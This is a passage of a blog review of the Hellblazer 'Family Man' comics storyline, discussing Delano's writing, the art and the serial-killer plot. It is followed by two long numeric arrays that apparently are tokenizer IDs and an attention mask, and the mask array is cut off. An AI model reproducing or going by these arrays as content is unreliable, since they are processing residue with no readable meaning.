continuous background, the panel borders slicing it into time. Characters are distinctive, even the ones who appear for a few pages. The figure drawing’s usually okay; a scene with a woman in underwear is one of the few times when the art actually sits right. The urban locations are recognisably depicted, and the grid’s solidity means we usually know where we are. It’s grounded art, better at dealing with humans than demons. Perhaps it’s better, in that sense, for this storyline than someone like Steve Bissette would be. But it’s bad, bad on every page, and you’ve been warned. (The editorial policy of Hellblazer was clearly to use British artists so we wouldn’t see the “thatched cottages in Trafalgar Square” Neil Gaiman once joked about. With local knowledge, you won’t get an artist who thinks Liverpool FC’s famous Kop is spelled COP… never mind. At least he got our towering, impossible, Escheresque motorway service stations bang on.) Hellblazer’s most grounded story yet begins in the fantastical. Constantine goes to see an old friend, a flamboyant, colourful character he’s tried to emulate: Jerry the Dealer. Jerry lives up to his description. He’s a literary character from the old school, leaping into life from scores of Victorian tales of the fantastic that involved a middleman. Creating this guy out of whole cloth, an archetype who surely could have been in Conan Doyle or Dickens – didn’t those books have need of a dealer? – is a significant achievement in a few pages. (Have I read books with Jerry in? The Finn in William Gibson’s Sprawl trilogy appears to be the same guy…) We’re not given chance to settle down with him, though, to examine all the references in his semi-scrawled, muddily-coloured home. Blind Pugh arrives at the same time at John, Sherlock Holmes has already been there and the Big Bad Wolf sends the pair running from the house. What follows is a romp, full of literary references and forebodings to be sure, but a romp nonetheless. Kevin O’Neill would have drawn the shit out of this script with a different character in every corner. Jerry’s the man in charge and John’s following in his wake, watching a hero become unreal and previewing his own eventual fate. It seemed, when it first appeared, a nice change of pace from the crushing doom and realism of the preceding Fear Machine story. A one-issue blowout reminding us that Constantine does magic as well as that serious stuff, magick. Except it continued. #24, after the brutal murder of a family of mundane suburbanites, sees John still hanging out in Jerry’s ruined house. There’s little in the way of action: he breaks into a safe, entertains a visitor, reads a diary, takes a phone call and goes crazy and burns the house down. The sense of dawning horror through the issue, the layering of ordinary actions and omens, is key to Delano’s Constantine. He does monstrous things willingly if he can justify them but won’t be unwittingly responsible. Apart from the anodyne happy family we begin with, the pitch is perfect; Constantine doesn’t really think, he just acts, and is the victim of his own curiosity. He has to delve into Jerry’s secrets, not just his safe but his diary, and in doing so finds out the corruption that his friend fell to. Supplying a serial killer obsessive with mementos from ongoing murders and a serial killer with victims. What scares Constantine about this, what sets the house aflame and him running, isn’t just that he’s become involved in murder. He’s accustomed to innocents dying. It hurts that he was a dupe, that he didn’t make the decision, but that’s just a pride thing. The fear is in how Jerry followed the vectors of his created personality to their grim conclusion. The ultimate dealer is a dealer in human life, of course, and death. Will John Constantine, another self-willed larger-than-life personality, the gambler with hell, fall prey to the same vanities? Is he Jerry waiting to happen? It wasn’t clear, back in 1990, that this was an ongoing storyline. The Fear Machine, which ended early and I’m not covering in this blog, had left Constantine looking for another new start. Three excellent fill-in issues teaming Grant Morrison & David Lloyd and Neil Gaiman & Dave McKean followed. We could have picked up with John anywhere. Instead we returned to London where he was living in fear above the bookie Chas is managing. Did Delano, not really a natural at plotting an ongoing series, take a break? Run out of ideas? Then return to that Family Man idea and realise there was something in it? #28 establishes that the game is on, that the killer is stalking John and that John’s hunting him in return. It ends with real fear; Constantine is going to have to do physical battle with a killer. He’s going to have to draw blood. The demons and magic that the book had been constructed around were off-limits. No good reason’s given for that but the writing dismisses them so effectively that I never even thought of the supernatural as an option, two issues on from a Winnie the Pooh guest appearance. There’s a closing feeling on those final pages, a collapsing of options. John begins it chasing redemption and ends it with only revenge, only kill-or-be-killed, as a possibility. He’s never faced this before. That’s slightly ridiculous from my rereading because the title character faces loads of physical threats in his first 12 issues, from four-armed skinheads to a time-lost platoon to a giant child-murderer. The comic gets away with it, though; it feels new. The single-minded focus on the chase, on how the mechanics of murder will be done, on schemes clever and stupid from a man out of his depth, drives the story forward. The Family Man kills Thomas Constantine up in Liverpool to send a signal, taking pleasure in it and understanding that he must sometimes prepare himself in ways that leave him exposed. John, usually armed only with his wits, buys a gun; not easy in England, and the man who sells it to him may only appear for a page but is unforgettably patronising. The sense of pursuit, of a world narrowed to only these two characters, both geniuses of their own misunderstood crafts, circling each other and waiting for the first move, is satisfyingly claustrophobic. Chas, the hapless Watson of the story, beats one and is beaten by the other. What’s happening in these issues is the clichéd serial killer story that begets a thousand 90s movies – the killer and his pursuer recognising that they’re the same – refusing to happen. The Family Man is, through blood, trying to draw John into his orbit. John, though musing on murder, is fighting it every step of the way. He doesn’t want to join the fraternity of killers. He hires a woman, a chubby prostitute, ostensibly to steel himself for his murder moment but actually to provide a refuge, to remind himself that he draws his strength from a different source. At the opening of #30, the storyline’s final issue, he has the drop on his killer and can’t use his advantage. He needs to face him, not to savour the feeling of taking a life but to explain himself, to say This isn’t me. The final issue flees the couple of blocks of London we’ve spent two issues haunting and hits the road; the M1 north, it looks like. It all ends underneath the motorway, in a passage created for cattle to be herded from one field to another. The gun proves mightier than the knife, a serial killer is killed and our hero, our protagonist, walks away with a cigarette and a sense of completion. He’s fought becoming Jerry and he’s fought becoming Homo Familiaris. Like the superhero comics of the 90s, where Batman and Superman got replaced and taught us to value the originals, Constantine shows us who he is by what he’s not. Hellblazer #23-#24 and #28-#30 are collected in the trade paperback Hellblazer: Family Man. Trackbacks […] so someone pretending to be Swamp Thing’s think-of-a-number serial killer takes his place. In Hellblazer #28 we see why he wasn’t there – John Constantine scammed his invite before executing him. It’s […]
[ 1, 306, 471, 263, 413, 5495, 408, 4720, 408, 306, 18093, 278, 13736, 13, 13, 4806, 5193, 29892, 502, 419, 1199, 22176, 29892, 1048, 907, 1230, 10907, 29889, 450, 9227, 322, 7664, 526, 5491, 278, 8569, 29892, 541, 297, 19781, 1301, 29883, 3906, 1736, 278, 12384, 391, 29892, 278, 5497, 261, 322, 278, 6920, 599, 29126, 408, 1568, 29889, 319, 1781, 3815, 338, 901, 1135, 278, 2533, 310, 967, 5633, 29889, 13, 13, 7058, 30010, 29879, 746, 372, 5771, 1492, 29892, 746, 278, 14601, 1608, 310, 3082, 419, 1199, 607, 16706, 701, 697, 1889, 964, 5320, 1422, 17643, 14061, 263, 18178, 29265, 322, 263, 2913, 393, 1736, 29889, 1205, 825, 1048, 746, 372, 1838, 30010, 29873, 29973, 1932, 263, 1781, 9227, 338, 269, 1202, 839, 411, 263, 4319, 7664, 29892, 411, 9644, 962, 2084, 7492, 12384, 292, 29892, 411, 3984, 9202, 5497, 292, 29973, 1724, 5930, 304, 263, 9227, 1058, 30010, 29879, 1985, 411, 385, 7664, 1058, 4216, 29879, 472, 3203, 263, 1813, 310, 7243, 1379, 297, 1432, 29871, 29906, 29946, 29899, 3488, 2228, 393, 1207, 278, 9591, 281, 1239, 411, 6788, 29973, 1317, 278, 5007, 8338, 3192, 1623, 411, 963, 470, 508, 372, 5401, 1549, 29973, 13, 13, 29934, 265, 323, 4983, 29892, 1058, 15010, 278, 14662, 2315, 5828, 1220, 297, 19339, 17530, 3298, 29892, 338, 1316, 385, 7664, 29889, 910, 338, 263, 8937, 519, 1776, 29936, 5087, 1075, 322, 366, 30010, 645, 1074, 393, 540, 471, 278, 28274, 310, 278, 7765, 310, 624, 6472, 8408, 504, 3605, 943, 313, 15970, 1835, 701, 297, 20861, 347, 22163, 30010, 29879, 1128, 1763, 1522, 530, 3012, 391, 29897, 322, 393, 540, 5456, 263, 3390, 287, 3407, 664, 2000, 11479, 18492, 292, 13932, 319, 8125, 29889, 1551, 670, 4700, 29892, 607, 306, 2113, 30010, 29873, 1544, 304, 1363, 306, 30010, 29881, 3265, 540, 3282, 30010, 29873, 1101, 738, 19367, 1250, 1244, 29892, 540, 7336, 1169, 393, 19339, 17530, 3298, 9007, 30010, 29873, 263, 21246, 7271, 363, 1075, 29889, 13, 13, 11284, 11546, 29892, 393, 5771, 363, 1716, 310, 502, 29889, 1126, 29892, 306, 30010, 29885, 24332, 29892, 363, 1556, 14332, 1683, 1058, 30010, 29879, 1303, 1438, 5626, 29889, 450, 1616, 338, 12151, 29899, 449, 4319, 29889, 383, 3302, 1106, 763, 28042, 17039, 287, 14051, 495, 11105, 29879, 411, 1835, 449, 24543, 29899, 29886, 549, 8229, 7988, 5076, 29889, 2896, 21706, 1735, 3171, 515, 9451, 304, 9451, 29889, 1670, 30010, 29879, 694, 7688, 304, 738, 310, 278, 3454, 29892, 694, 4060, 310, 825, 30010, 29879, 363, 18128, 322, 825, 30010, 29879, 3239, 470, 988, 591, 881, 367, 3063, 29889, 313, 1576, 297, 29895, 414, 1735, 541, 363, 472, 3203, 697, 2228, 372, 30010, 29879, 4485, 16281, 16094, 29892, 2998, 363, 670, 12844, 1416, 1196, 1846, 1126, 372, 30010, 29879, 22769, 29892, 4029, 1091, 368, 22769, 297, 278, 878, 7807, 29892, 297, 278, 282, 9390, 29892, 297, 278, 9654, 3239, 29879, 607, 380, 2235, 278, 8424, 29892, 297, 278, 13689, 1328, 322, 16051, 3158, 15602, 29889, 7753, 19141, 862, 30010, 29879, 5497, 292, 338, 640, 18054, 2820, 278, 1616, 29889, 13, 13, 25125, 372, 4418, 373, 1432, 3233, 29973, 739, 508, 30010, 29873, 29892, 6467, 445, 5828, 7656, 30010, 29873, 505, 278, 3081, 338, 756, 29889, 323, 4983, 30010, 29879, 5828, 29873, 7807, 29358, 2560, 4610, 1041, 411, 17841, 15347, 29890, 787, 30010, 29879, 24274, 1527, 29901, 278, 14183, 29899, 15119, 6856, 29892, 278, 671, 310, 2999, 7243, 1379, 373, 263, 1813, 1401, 919, 292, 263, 2931, 8401, 4822, 263, 9126, 3239, 29892, 278, 9451, 28199, 269, 506, 292, 372, 964, 931, 29889, 2896, 21706, 526, 8359, 573, 29892, 1584, 278, 6743, 1058, 2615, 363, 263, 2846, 6515, 29889, 450, 4377, 11580, 30010, 29879, 5491, 20759, 29936, 263, 9088, 411, 263, 6114, 297, 1090, 705, 279, 338, 697, 310, 278, 2846, 3064, 746, 278, 1616, 2869, 269, 1169, 1492, 29889, 450, 17164, 14354, 526, 5936, 275, 2197, 1401, 18186, 29892, 322, 278, 6856, 30010, 29879, 7773, 537, 2794, 591, 5491, 1073, 988, 591, 526, 29889, 739, 30010, 29879, 5962, 287, 1616, 29892, 2253, 472, 16743, 411, 25618, 1135, 1261, 787, 29889, 11637, 372, 30010, 29879, 2253, 29892, 297, 393, 4060, 29892, 363, 445, 5828, 1220, 1135, 4856, 763, 13981, 350, 790, 2353, 723, 367, 29889, 1205, 372, 30010, 29879, 4319, 29892, 4319, 373, 1432, 1813, 29892, 322, 366, 30010, 345, 1063, 1370, 9571, 29889, 13, 13, 29898, 1576, 6920, 616, 8898, 310, 19339, 17530, 3298, 471, 9436, 304, 671, 4908, 17906, 577, 591, 7656, 30010, 29873, 1074, 278, 1346, 386, 905, 287, 274, 1501, 1179, 297, 323, 1929, 284, 5397, 19256, 30024, 29334, 10415, 25895, 2748, 432, 12504, 1048, 29889, 2973, 1887, 7134, 29892, 366, 2113, 30010, 29873, 679, 385, 7664, 1058, 22405, 24607, 7992, 30010, 29879, 13834, 27476, 338, 805, 14356, 315, 4590, 30098, 2360, 3458, 29889, 2180, 3203, 540, 2355, 1749, 19372, 292, 29892, 9301, 29892, 382, 816, 11175, 802, 10992, 1582, 2669, 16355, 289, 574, 373, 1846, 13, 13, 29950, 514, 17530, 3298, 30010, 29879, 1556, 5962, 287, 5828, 3447, 16410, 297, 278, 13568, 579, 936, 29889, 5798, 20578, 5771, 304, 1074, 385, 2030, 5121, 29892, 263, 1652, 314, 19415, 424, 29892, 12384, 1319, 2931, 540, 30010, 29879, 1898, 304, 953, 5987, 29901, 23052, 278, 897, 18362, 29889, 23052, 12080, 701, 304, 670, 6139, 29889, 940, 30010, 29879, 263, 22937, 2931, 515, 278, 2030, 3762, 29892, 454, 21430, 964, 2834, 515, 19435, 310, 12684, 713, 29763, 310, 278, 13568, 6288, 393, 9701, 263, 7256, 1171, 29889, 26221, 445, 1410, 29891, 714, 310, 3353, 13950, 29892, 385, 3190, 300, 668, 1058, 18880, 1033, 505, 1063, 297, 1281, 273, 1938, 1508, 470, 12488, 575, 785, 3282, 30010, 29873, 1906, 8277, 505, 817, 310, 263, 5376, 261, 29973, 785, 338, 263, 7282, 27012, 882, 297, 263, 2846, 6515, 29889, 313, 25559, 306, 1303, 8277, 411, 23052, 297, 29973, 450, 21189, 297, 4667, 15347, 1100, 30010, 29879, 1706, 1610, 29880, 534, 309, 6933, 5692, 304, 367, 278, 1021, 1410, 29891, 30098, 29897, 1334, 30010, 276, 451, 2183, 8825, 304, 3604, 280, 1623, 411, 1075, 29892, 2466, 29892, 304, 25917, 599, 278, 9282, 297, 670, 12647, 29899, 1557, 1610, 839, 29892, 17439, 29881, 2354, 29899, 1054, 14076, 3271, 29889, 3164, 513, 349, 6129, 6974, 267, 472, 278, 1021, 931, 472, 2259, 29892, 17375, 908, 4168, 4467, 756, 2307, 1063, 727, 322, 278, 7997, 9178, 10441, 16003, 278, 5101, 2734, 515, 278, 3699, 29889, 1724, 4477, 338, 263, 6017, 29886, 29892, 2989, 310, 22937, 9282, 322, 363, 774, 397, 886, 304, 367, 1854, 29892, 541, 263, 6017, 29886, 1661, 621, 6393, 29889, 19323, 438, 30010, 8139, 453, 723, 505, 12061, 278, 528, 277, 714, 310, 445, 2471, 411, 263, 1422, 2931, 297, 1432, 11155, 29889, 23052, 30010, 29879, 278, 767, 297, 8323, 322, 2259, 30010, 29879, 1494, 297, 670, 281, 1296, 29892, 21217, 263, 13444, 4953, 443, 6370, 322, 25267, 292, 670, 1914, 1741, 950, 23779, 29889, 739, 6140, 29892, 746, 372, 937, 7470, 29892, 263, 7575, 1735, 310, 27725, 515, 278, 2181, 21616, 437, 290, 322, 1855, 1608, 310, 278, 26328, 383, 799, 6189, 5828, 29889, 319, 697, 29899, 15118, 13031, 449, 1083, 4015, 502, 393, 5798, 20578, 947, 15709, 408, 1532, 408, 393, 10676, 6433, 29892, 2320, 860, 29889, 13, 13, 1252, 1547, 372, 7572, 29889, 396, 29906, 29946, 29892, 1156, 278, 26644, 284, 13406, 310, 263, 3942, 310, 286, 870, 1662, 1014, 25006, 3246, 29892, 18553, 2259, 1603, 298, 9776, 714, 297, 23052, 30010, 29879, 5796, 1312, 3699, 29889, 1670, 30010, 29879, 2217, 297, 278, 982, 310, 3158, 29901, 540, 16706, 964, 263, 9109, 29892, 875, 814, 2708, 263, 27682, 29892, 13623, 263, 652, 653, 29892, 4893, 263, 9008, 1246, 322, 5771, 12220, 1537, 322, 12138, 29879, 278, 3699, 1623, 29889, 450, 4060, 310, 1146, 29893, 1076, 23026, 1549, 278, 2228, 29892, 278, 7546, 292, 310, 15311, 8820, 322, 2703, 575, 29892, 338, 1820, 304, 5556, 1562, 30010, 29879, 5798, 20578, 29889, 940, 947, 1601, 710, 681, 2712, 674, 11687, 565, 540, 508, 26922, 963, 541, 2113, 30010, 29873, 367, 18500, 5367, 368, 14040, 29889, 319, 1595, 515, 278, 385, 1486, 484, 9796, 3942, 591, 3380, 411, 29892, 278, 15905, 338, 4922, 29936, 5798, 20578, 1838, 30010, 29873, 2289, 1348, 29892, 540, 925, 14741, 29892, 322, 338, 278, 28985, 310, 670, 1914, 27742, 29889, 940, 756, 304, 628, 345, 964, 23052, 30010, 29879, 22183, 1372, 29892, 451, 925, 670, 9109, 541, 670, 652, 653, 29892, 322, 297, 2599, 577, 14061, 714, 278, 1034, 18953, 393, 670, 5121, 8379, 304, 29889, 9179, 5890, 263, 7797, 413, 5495, 20881, 404, 573, 411, 286, 882, 359, 515, 373, 17696, 7167, 8623, 322, 263, 7797, 413, 5495, 411, 6879, 9893, 29889, 13, 13, 5618, 885, 5114, 5798, 20578, 1048, 445, 29892, 825, 6166, 278, 3699, 263, 1579, 420, 322, 1075, 2734, 29892, 3508, 30010, 29873, 925, 393, 540, 30010, 29879, 4953, 9701, 297, 13406, 29889, 940, 30010, 29879, 1035, 1796, 287, 304, 21458, 1237, 27116, 29889, 739, 12166, 1372, 393, 540, 471, 263, 868, 412, 29892, 393, 540, 3282, 30010, 29873, 1207, 278, 10608, 29892, 541, 393, 30010, 29879, 925, 263, 24967, 2655, 29889, 450, 8866, 338, 297, 920, 23052, 5643, 278, 12047, 310, 670, 2825, 2022, 2877, 304, 1009, 867, 326, 15997, 29889, 450, 8494, 6490, 5376, 261, 338, 263, 5376, 261, 297, 5199, 2834, 29892, 310, 3236, 29892, 322, 4892, 29889, 2811, 2259, 5798, 20578, 29892, 1790, 1583, 29899, 29893, 24455, 7200, 29899, 27603, 29899, 19264, 2022, 2877, 29892, 278, 330, 1117, 1358, 411, 23927, 29892, 6416, 758, 29891, 304, 278, 1021, 1109, 1907, 29973, 1317, 540, 23052, 10534, 304, 3799, 29973, 13, 13, 3112, 9007, 30010, 29873, 2821, 29892, 1250, 297, 29871, 29896, 29929, 29929, 29900, 29892, 393, 445, 471, 385, 373, 17696, 5828, 1220, 29889, 450, 383, 799, 6189, 29892, 607, 9698, 4688, 322, 306, 30010, 29885, 451, 21653, 297, 445, 12618, 29892, 750, 2175, 5798, 20578, 3063, 363, 1790, 716, 1369, 29889, 12753, 15129, 5445, 29899, 262, 5626, 3815, 292, 18102, 3879, 29878, 2285, 669, 4699, 27054, 322, 29334, 10415, 25895, 669, 17841, 4052, 9598, 273, 5643, 29889, 1334, 1033, 505, 18691, 701, 411, 2259, 12214, 29889, 8669, 591, 4133, 304, 4517, 988, 540, 471, 8471, 297, 8866, 2038, 278, 3143, 347, 678, 294, 338, 767, 6751, 29889, 7440, 5556, 1562, 29892, 451, 2289, 263, 5613, 472, 6492, 1259, 385, 373, 17696, 3652, 29892, 2125, 263, 2867, 29973, 7525, 714, 310, 7014, 29973, 1987, 736, 304, 393, 14662, 2315, 2969, 322, 1855, 895, 727, 471, 1554, 297, 372, 29973, 13, 13, 29937, 29906, 29947, 10127, 267, 393, 278, 3748, 338, 373, 29892, 393, 278, 413, 5495, 338, 380, 2235, 292, 2259, 322, 393, 2259, 30010, 29879, 29826, 1075, 297, 736, 29889, 739, 10614, 411, 1855, 8866, 29936, 5798, 20578, 338, 2675, 304, 505, 304, 437, 9128, 10555, 411, 263, 413, 5495, 29889, 940, 30010, 29879, 2675, 304, 505, 304, 4216, 10416, 29889, 450, 1261, 787, 322, 15709, 393, 278, 3143, 750, 1063, 13319, 2820, 892, 1283, 29899, 12514, 29889, 1939, 1781, 2769, 30010, 29879, 2183, 363, 393, 541, 278, 5007, 18918, 267, 963, 577, 17583, 393, 306, 2360, 1584, 2714, 310, 278, 2428, 25047, 408, 385, 2984, 29892, 1023, 5626, 373, 515, 263, 399, 2559, 347, 278, 3929, 1148, 17838, 10097, 29889, 1670, 30010, 29879, 263, 14382, 11223, 373, 1906, 2186, 6515, 29892, 263, 784, 14128, 292, 310, 3987, 29889, 2259, 16410, 372, 521, 5832, 337, 2310, 683, 322, 10614, 372, 411, 871, 20957, 479, 29892, 871, 12088, 29899, 272, 29899, 915, 29899, 16757, 839, 29892, 408, 263, 13331, 29889, 940, 30010, 29879, 2360, 20050, 445, 1434, 29889, 13, 13, 7058, 30010, 29879, 10029, 8177, 12906, 681, 515, 590, 364, 406, 9382, 1363, 278, 3611, 2931, 17240, 15376, 310, 9128, 12455, 1446, 297, 670, 937, 29871, 29896, 29906, 5626, 29892, 515, 3023, 29899, 279, 2168, 19309, 2813, 29879, 304, 263, 931, 29899, 18767, 715, 1219, 265, 304, 263, 28396, 2278, 29899, 29885, 332, 672, 261, 29889, 450, 419, 293, 4947, 3448, 411, 372, 29892, 2466, 29936, 372, 23880, 716, 29889, 450, 2323, 29899, 24021, 287, 8569, 373, 278, 521, 559, 29892, 373, 920, 278, 7208, 1199, 310, 13406, 674, 367, 2309, 29892, 373, 27715, 23455, 322, 20239, 515, 263, 767, 714, 310, 670, 10809, 29892, 25100, 278, 5828, 6375, 29889, 450, 14662, 2315, 413, 6090, 5569, 5798, 20578, 701, 297, 24607, 304, 3638, 263, 7182, 29892, 5622, 15377, 297, 372, 322, 8004, 393, 540, 1818, 6041, 19012, 3654, 297, 5837, 393, 5967, 1075, 19884, 29889, 2259, 29892, 5491, 23926, 871, 411, 670, 281, 1169, 29892, 1321, 952, 263, 13736, 29936, 451, 4780, 297, 5408, 29892, 322, 278, 767, 1058, 269, 10071, 372, 304, 1075, 1122, 871, 2615, 363, 263, 1813, 541, 338, 443, 1454, 657, 29873, 2197, 18259, 5921, 29889, 450, 4060, 310, 12359, 3121, 29892, 310, 263, 3186, 12474, 287, 304, 871, 1438, 1023, 4890, 29892, 1716, 26858, 267, 310, 1009, 1914, 19818, 9337, 25554, 29879, 29892, 5902, 19914, 1269, 916, 322, 10534, 363, 278, 937, 4337, 29892, 338, 24064, 368, 3711, 504, 19783, 711, 293, 29889, 678, 294, 29892, 278, 447, 572, 404, 28284, 310, 278, 5828, 29892, 367, 1446, 697, 322, 338, 367, 2579, 491, 278, 916, 29889, 13, 13, 5618, 30010, 29879, 10464, 297, 1438, 5626, 338, 278, 1067, 436, 2487, 7797, 413, 5495, 5828, 393, 367, 20078, 263, 10405, 29871, 29929, 29900, 29879, 2351, 583, 785, 278, 413, 5495, 322, 670, 12359, 2853, 5936, 5921, 393, 896, 30010, 276, 278, 1021, 785, 2143, 4746, 304, 3799, 29889, 450, 14662, 2315, 338, 29892, 1549, 10416, 29892, 1811, 304, 4216, 2259, 964, 670, 16980, 29889, 2259, 29892, 2466, 2301, 292, 373, 13406, 29892, 338, 17770, 372, 1432, 4331, 310, 278, 982, 29889, 940, 1838, 30010, 29873, 864, 304, 5988, 278, 20998, 824, 537, 310, 12088, 414, 29889, 940, 298, 2658, 263, 6114, 29892, 263, 521, 431, 1609, 16810, 12356, 29892, 14750, 575, 14981, 304, 22973, 3654, 363, 670, 13406, 3256, 541, 2869, 304, 3867, 263, 25447, 29892, 304, 1083, 513, 3654, 393, 540, 4216, 29879, 670, 9324, 515, 263, 1422, 2752, 29889, 2180, 278, 8718, 310, 396, 29941, 29900, 29892, 278, 5828, 1220, 30010, 29879, 2186, 2228, 29892, 540, 756, 278, 5768, 373, 670, 413, 5495, 322, 508, 30010, 29873, 671, 670, 10631, 29889, 940, 4225, 304, 3700, 1075, 29892, 451, 304, 4048, 473, 278, 11223, 310, 5622, 263, 2834, 541, 304, 5649, 3654, 29892, 304, 1827, 910, 3508, 30010, 29873, 592, 29889, 13, 13, 1576, 2186, 2228, 9115, 267, 278, 7303, 310, 10930, 310, 4517, 591, 30010, 345, 10398, 1023, 5626, 447, 348, 1259, 322, 19572, 278, 6520, 29936, 278, 341, 29896, 6641, 29892, 372, 3430, 763, 29889, 739, 599, 10614, 1090, 484, 493, 278, 10992, 1582, 29892, 297, 263, 13382, 2825, 363, 27498, 304, 367, 902, 7176, 515, 697, 1746, 304, 1790, 29889, 450, 13736, 28281, 1795, 631, 1135, 278, 889, 1607, 29892, 263, 7797, 413, 5495, 338, 9445, 322, 1749, 13444, 29892, 1749, 15572, 391, 29892, 17042, 2039, 3448, 411, 263, 29507, 10474, 371, 322, 263, 4060, 310, 13285, 29889, 940, 30010, 29879, 20722, 14171, 23052, 322, 540, 30010, 29879, 20722, 14171, 379, 10730, 6280, 4447, 275, 29889, 8502, 278, 2428, 29882, 1489, 419, 1199, 310, 278, 29871, 29929, 29900, 29879, 29892, 988, 12579, 1171, 322, 5670, 1171, 2355, 8611, 322, 16187, 502, 304, 995, 278, 2441, 29879, 29892, 5798, 20578, 3697, 502, 1058, 540, 338, 491, 825, 540, 30010, 29879, 451, 29889, 13, 13, 29950, 514, 17530, 3298, 396, 29906, 29941, 29899, 29937, 29906, 29946, 322, 396, 29906, 29947, 29899, 29937, 29941, 29900, 526, 16531, 297, 278, 11302, 5650, 1627, 19339, 17530, 3298, 29901, 14662, 2315, 29889, 13, 13, 17936, 1627, 29879, 13, 13, 29961, 30098, 29962, 577, 4856, 14794, 2548, 304, 367, 3925, 1160, 498, 292, 30010, 29879, 1348, 29899, 974, 29899, 29874, 29899, 4537, 7797, 413, 5495, 4893, 670, 2058, 29889, 512, 19339, 17530, 3298, 396, 29906, 29947, 591, 1074, 2020, 540, 9007, 30010, 29873, 727, 785, 2259, 5798, 20578, 885, 28913, 670, 2437, 568, 1434, 14012, 1075, 29889, 739, 30010, 29879, 518, 30098, 29962 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 